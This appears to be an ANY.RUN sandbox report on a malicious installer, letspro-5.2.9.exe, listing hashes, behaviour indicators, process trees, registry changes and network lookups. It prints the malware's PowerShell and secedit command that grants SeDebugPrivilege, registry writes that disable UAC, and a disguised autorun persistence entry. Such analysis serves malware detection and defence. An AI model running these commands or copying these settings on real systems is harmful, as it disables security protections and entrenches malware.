File name:

letspro-5.2.9.exe

Full analysis: https://app.any.run/tasks/a072fce9-80d0-42a1-9176-7c70ba31e325
Verdict: Malicious activity
Analysis date: May 21, 2025, 19:56:42
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-reg
lua
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (GUI) x86-64, for MS Windows, 6 sections
MD5:

9AF2A842E57624C00F5A3C946D9A95CD

SHA1:

23301B034C72DB35F8A306CF0B1E5AC0EC7AF9CB

SHA256:

26357C799752CE0EA03946D2816A1C69F9B9D2A768F486AF9277025D43A7333F

SSDEEP:

196608:tDcjfVmKbOkOisgbxI1VfVOuWIzU1K2zZawW:tDsftbOkOPgb6dOXSUFZDW

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Executing a file with an untrusted certificate

      • letspro-5.2.9.exe (PID: 1660)

    • Antivirus name has been found in the command line (generic signature)

      • powershell.exe (PID: 4756)

    • Changes the autorun value in the registry

      • iusb3mon.exe (PID: 1128)

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 4300)

    • UAC/LUA settings modification

      • iusb3mon.exe (PID: 1128)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)

    • Reads security settings of Internet Explorer

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
      • ShellExperienceHost.exe (PID: 5740)

    • Reads the date of Windows installation

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)

    • Reads the Windows owner or organization settings

      • irsetup.exe (PID: 6540)

    • Starts POWERSHELL.EXE for commands execution

      • irsetup.exe (PID: 6540)
      • iusb3mon.exe (PID: 1128)

    • Get information on the list of running processes

      • irsetup.exe (PID: 6540)

    • The process drops C-runtime libraries

      • irsetup.exe (PID: 6540)

    • Process drops legitimate windows executable

      • irsetup.exe (PID: 6540)

    • Starts CMD.EXE for commands execution

      • iusb3mon.exe (PID: 1128)

    • There is functionality for taking screenshot (YARA)

      • iusb3mon.exe (PID: 1128)

    • Removes files via Powershell

      • powershell.exe (PID: 2616)
      • powershell.exe (PID: 5960)

    • Manipulates environment variables

      • powershell.exe (PID: 2616)
      • powershell.exe (PID: 5960)

    • The process bypasses the loading of PowerShell profile settings

      • iusb3mon.exe (PID: 1128)

    • Base64-obfuscated command line is found

      • iusb3mon.exe (PID: 1128)

    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 5960)

    • Writes data into a file (POWERSHELL)

      • powershell.exe (PID: 5960)

    • Connects to unusual port

      • iusb3mon.exe (PID: 1128)

  • INFO

    • Create files in a temporary directory

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
      • iusb3mon.exe (PID: 1128)
      • SecEdit.exe (PID: 4024)
      • SecEdit.exe (PID: 2908)

    • The sample compiled with english language support

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)

    • Reads the computer name

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
      • iusb3mon.exe (PID: 1128)
      • ShellExperienceHost.exe (PID: 5740)

    • Checks supported languages

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)
      • iusb3mon.exe (PID: 1128)
      • iusb3mon.exe (PID: 812)
      • ShellExperienceHost.exe (PID: 5740)

    • Process checks computer location settings

      • letspro-5.2.9.exe (PID: 5892)
      • irsetup.exe (PID: 6540)

    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6656)
      • powershell.exe (PID: 5392)
      • powershell.exe (PID: 4756)
      • powershell.exe (PID: 1324)
      • powershell.exe (PID: 5436)
      • powershell.exe (PID: 6272)

    • Creates files or folders in the user directory

      • irsetup.exe (PID: 6540)

    • The process uses Lua

      • irsetup.exe (PID: 6540)

    • The sample compiled with chinese language support

      • irsetup.exe (PID: 6540)

    • Creates files in the program directory

      • irsetup.exe (PID: 6540)

    • Auto-launch of the file from Registry key

      • iusb3mon.exe (PID: 1128)

    • Process checks whether UAC notifications are on

      • iusb3mon.exe (PID: 1128)

    • Manual execution by a user

      • iusb3mon.exe (PID: 812)

    • Reads the software policy settings

      • slui.exe (PID: 7148)

    • Checks proxy server information

      • slui.exe (PID: 7148)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2012:06:14 16:16:12+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 10
CodeSize: 25088
InitializedDataSize: 49664
UninitializedDataSize: -
EntryPoint: 0x2d1c
OSVersion: 5.2
ImageVersion: -
SubsystemVersion: 5.2
Subsystem: Windows GUI
FileVersionNumber: 9.1.0.0
ProductVersionNumber: 9.1.0.0
FileFlagsMask: 0x003f
FileFlags: Private build
FileOS: Windows NT 32-bit
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (U.S.)
CharacterSet: Windows, Latin1
Comments: Created with Setup Factory
FileDescription: Setup Application
FileVersion: 9.1.0.0
InternalName: suf_launch
LegalCopyright: Setup Engine Copyright © 2004-2012 Indigo Rose Corporation
LegalTrademarks: Setup Factory is a trademark of Indigo Rose Corporation.
OriginalFileName: suf_launch.exe
ProductName: Setup Factory Runtime
ProductVersion: 9.1.0.0
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
156
Monitored processes
31
Malicious processes
3
Suspicious processes
2

Behavior graph

Click at the process to see the details
start letspro-5.2.9.exe irsetup.exe powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs conhost.exe no specs iusb3mon.exe rundll32.exe no specs cmd.exe no specs conhost.exe no specs schtasks.exe no specs powershell.exe no specs powershell.exe no specs conhost.exe no specs conhost.exe no specs shellexperiencehost.exe no specs secedit.exe no specs secedit.exe no specs iusb3mon.exe no specs slui.exe letspro-5.2.9.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
812C:\Users\admin\AppData\Local\AppData\iusb3mon.exeC:\Users\admin\AppData\Local\AppData\iusb3mon.exeexplorer.exe
User:
admin
Company:
腾讯科技(深圳)有限公司
Integrity Level:
MEDIUM
Description:
腾讯课堂
Exit code:
0
Version:
4, 6, 1, 2
Modules
Images
c:\users\admin\appdata\local\appdata\iusb3mon.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\ucrtbase.dll
c:\windows\syswow64\shell32.dll
1128"C:\Users\admin\AppData\Local\AppData\iusb3mon.exe" C:\Users\admin\AppData\Local\AppData\iusb3mon.exe
irsetup.exe
User:
admin
Company:
腾讯科技(深圳)有限公司
Integrity Level:
HIGH
Description:
腾讯课堂
Version:
4, 6, 1, 2
Modules
Images
c:\users\admin\appdata\local\appdata\iusb3mon.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\ucrtbase.dll
1244\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
1324"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeirsetup.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
1660"C:\Users\admin\AppData\Local\Temp\letspro-5.2.9.exe" C:\Users\admin\AppData\Local\Temp\letspro-5.2.9.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Description:
Setup Application
Exit code:
3221226540
Version:
9.1.0.0
Modules
Images
c:\users\admin\appdata\local\temp\letspro-5.2.9.exe
c:\windows\system32\ntdll.dll
2616\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2616powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\Users\admin\AppData\Local\AppData",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeiusb3mon.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
2908"C:\WINDOWS\system32\SecEdit.exe" /configure /db C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege1.log /quietC:\Windows\SysWOW64\SecEdit.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Security Configuration Editor Command Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\secedit.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\scecli.dll
3676\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4024"C:\WINDOWS\system32\SecEdit.exe" /configure /db C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\admin\AppData\Local\Temp\SeDebugPrivilege4.log /quietC:\Windows\SysWOW64\SecEdit.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows Security Configuration Editor Command Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\secedit.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\scecli.dll
Total events
40 873
Read events
40 863
Write events
8
Delete events
2

Modification events

(PID) Process:(1128) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Miscrosoft
Value:
C:\Users\admin\AppData\Local\AppData\iusb3mon.exe
(PID) Process:(1128) iusb3mon.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Miscrosoft
Value:
C:\Users\admin\AppData\Local\AppData\iusb3mon.exe
(PID) Process:(1128) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:ConsentPromptBehaviorAdmin
Value:
0
(PID) Process:(1128) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:EnableLUA
Value:
0
(PID) Process:(1128) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:PromptOnSecureDesktop
Value:
0
(PID) Process:(5740) ShellExperienceHost.exeKey:\REGISTRY\A\{887107ec-4bbc-3011-75b4-879bf27dc43e}\LocalState
Operation:writeName:PeekBadges
Value:
5B005D000000E4B176988ACADB01
(PID) Process:(2908) SecEdit.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation:delete valueName:LastWinlogonConfig
Value:
(PID) Process:(4024) SecEdit.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SecEdit
Operation:delete valueName:LastWinlogonConfig
Value:
(PID) Process:(1128) iusb3mon.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
Operation:writeName:DisableLockWorkstation
Value:
0
Executable files
7
Suspicious files
5
Text files
23
Unknown types
0

Dropped files

PID
Process
Filename
Type
5892letspro-5.2.9.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exeexecutable
MD5:2A7D5F8D3FB4AB753B226FD88D31453B
SHA256:879109AE311E9B88F930CE1C659F29EC0E338687004318661E604D0D3727E3CF
6540irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG1.JPGimage
MD5:3220A6AEFB4FC719CC8849F060859169
SHA256:988CF422CBF400D41C48FBE491B425A827A1B70691F483679C1DF02FB9352765
1324powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rcpjv2hr.1lt.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5892letspro-5.2.9.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dllexecutable
MD5:958103E55C74427E5C66D7E18F3BF237
SHA256:3EA4A4C3C6DEA44D8917B342E93D653F59D93E1F552ACE16E97E43BB04E951D8
6540irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.datbinary
MD5:C807431EB8A80C3505150966D5004B2C
SHA256:35147BE2995F0CC211A7022C7C77061BFD5D2CF73491798BFC8F092D9E9DFA87
6540irsetup.exeC:\Users\admin\AppData\Local\Temp\_ir_sf_temp_0\IRIMG2.JPGimage
MD5:AC40DED6736E08664F2D86A65C47EF60
SHA256:F35985FE1E46A767BE7DCEA35F8614E1EDD60C523442E6C2C2397D1E23DBD3EA
5072powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wqtbmt4o.ef5.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
5072powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_agmde55c.bin.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6656powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_vg1fiqdw.3hp.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6656powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rw3dk0gl.nyc.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
92
DNS requests
16
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2104
svchost.exe
GET
200
2.23.246.101:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
QA
binary
868 b
whitelisted
5084
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
DE
binary
419 b
whitelisted
5084
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
DE
binary
407 b
whitelisted
6544
svchost.exe
GET
200
184.30.131.245:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
US
binary
471 b
whitelisted
2104
svchost.exe
GET
200
2.16.168.114:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
RU
binary
825 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4
System
192.168.100.255:138
whitelisted
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2104
svchost.exe
2.16.168.114:80
crl.microsoft.com
Akamai International B.V.
RU
whitelisted
2104
svchost.exe
2.23.246.101:80
www.microsoft.com
Ooredoo Q.S.C.
QA
whitelisted
2104
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
5084
SIHClient.exe
4.175.87.197:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted
5084
SIHClient.exe
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
5084
SIHClient.exe
40.69.42.241:443
fe3cr.delivery.mp.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted

DNS requests

Domain
IP
Reputation
google.com
  • 216.58.206.78
whitelisted
settings-win.data.microsoft.com
  • 51.104.136.2
whitelisted
crl.microsoft.com
  • 2.16.168.114
  • 2.16.168.124
whitelisted
www.microsoft.com
  • 2.23.246.101
  • 184.30.21.171
whitelisted
client.wns.windows.com
  • 172.211.123.250
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 40.69.42.241
whitelisted
jjiiee.com
  • 27.124.34.146
unknown
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted
nexusrules.officeapps.live.com
  • 52.111.227.14
whitelisted

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
letspro-5.2.9.exe